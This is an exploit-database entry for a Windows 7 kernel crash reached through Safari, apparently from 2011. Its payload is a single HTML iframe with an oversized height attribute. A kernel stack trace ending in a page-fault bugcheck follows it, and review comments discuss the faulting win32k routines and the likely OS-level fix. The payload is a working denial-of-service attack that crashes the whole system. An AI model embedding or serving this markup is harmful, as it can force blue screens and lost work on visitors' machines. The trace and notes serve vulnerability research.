Apple Safari - GdiDrawStream Blue Screen of Death

EDB-ID: 18275
Author: webDEViL
Type: dos
Date: 2011-12-18


# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil

<!--
  Test case as published: one iframe whose height attribute is the very large
  value 18082563. There is no script; the attribute alone is the input.

  Per the stack trace on this page, the crash is in the kernel, not in the
  browser process: a system call (nt!KiSystemServiceCopyEnd) enters
  win32k!NtGdiDrawStream, continues through win32k!GreDrawStream,
  win32k!NtGdiDrawStreamInternal, win32k!EngDrawStream and
  win32k!EngNineGrid, and ends in win32k!memmove, where nt!KiPageFault
  leads to nt!KeBugCheckEx. The first KeBugCheckEx value shown is 0x50
  (PAGE_FAULT_IN_NONPAGED_AREA).

  NOTE(review): the win32k!NtGdiUpdateTransform+0x... frames carry large
  offsets and are probably nearest-symbol matches for internal routines;
  confirm with full symbols before naming the faulting function.
  NOTE(review): the page classifies this as dos and shows only a bugcheck.
  Whether the faulting copy is controllable is not established here.
  NOTE(review): the header lists only Windows 7 x64 with Safari as tested.
  Because the fault is inside win32k, the durable fix is presumably an OS
  update rather than a browser-side change; verify against vendor advisories.
-->
<iframe height='18082563'></iframe>


---#---
STACK_TEXT:
fffff880`08b50f78 fffff800`0328e3bf : 00000000`00000050 fffff904`c2730258 00000000`00000001 fffff880`08b510e0 : nt!KeBugCheckEx
fffff880`08b50f80 fffff800`032e1d6e : 00000000`00000001 fffff904`c2730258 00000000`00002700 fffff880`08b51380 : nt! ?? ::FNODOBFM::`string'+0x44791
fffff880`08b510e0 fffff960`00164e2e : fffff960`00280a11 fffff900`c1f11320 fffff900`c273fe38 00000000`28451d38 : nt!KiPageFault+0x16e
fffff880`08b51278 fffff960`00280a11 : fffff900`c1f11320 fffff900`c273fe38 00000000`28451d38 00000011`00000001 : win32k!memmove+0x25e
fffff880`08b51280 fffff960`00280ca2 : fffff880`08b51380 00000000`000001dc fffff900`c2062c78 fffff904`c2730238 : win32k!NtGdiUpdateTransform+0x161
fffff880`08b512b0 fffff960`002815e4 : 00000000`000001dc fffff902`c2734638 00000000`0009f580 00000000`00000000 : win32k!NtGdiUpdateTransform+0x3f2
fffff880`08b51310 fffff960`00281854 : fffff900`c2730018 fffff900`c2062978 00000000`fffffff2 fffff900`00000001 : win32k!NtGdiUpdateTransform+0xd34
fffff880`08b514f0 fffff960`0028208e : fffff900`c1d1a028 00000000`00000000 fffff900`c2730018 00000000`00000000 : win32k!NtGdiUpdateTransform+0xfa4
fffff880`08b515b0 fffff960`002821fd : fffff900`c1d1a028 fffff900`c2062978 00000000`0009f580 fffff900`c1f11320 : win32k!NtGdiUpdateTransform+0x17de
fffff880`08b516d0 fffff960`002823bc : fffff900`c00c0010 00000000`0000003c fffff880`08b51b20 fffff900`c1d1a010 : win32k!EngNineGrid+0xb1
fffff880`08b51770 fffff960`00282879 : 00000000`00000000 fffff900`c2062978 00000000`00000000 fffff900`c1d1a010 : win32k!EngDrawStream+0x1a0
fffff880`08b51820 fffff960`002831cb : fffff880`08b51938 00000000`00000000 fffff900`c2062960 fffff900`c1f11320 : win32k!NtGdiDrawStreamInternal+0x47d
fffff880`08b518d0 fffff960`0029e93c : 00000000`3f010ad8 00000000`00000000 fffff880`08b51af0 fffff960`00000000 : win32k!GreDrawStream+0x917
fffff880`08b51ac0 fffff800`032e2ed3 : fffffa80`09777b60 00000000`00010000 00000000`000309c0 00000000`7efdb000 : win32k!NtGdiDrawStream+0x9c
fffff880`08b51c20 00000000`73f003fa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0021dd78 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x73f003fa
---#---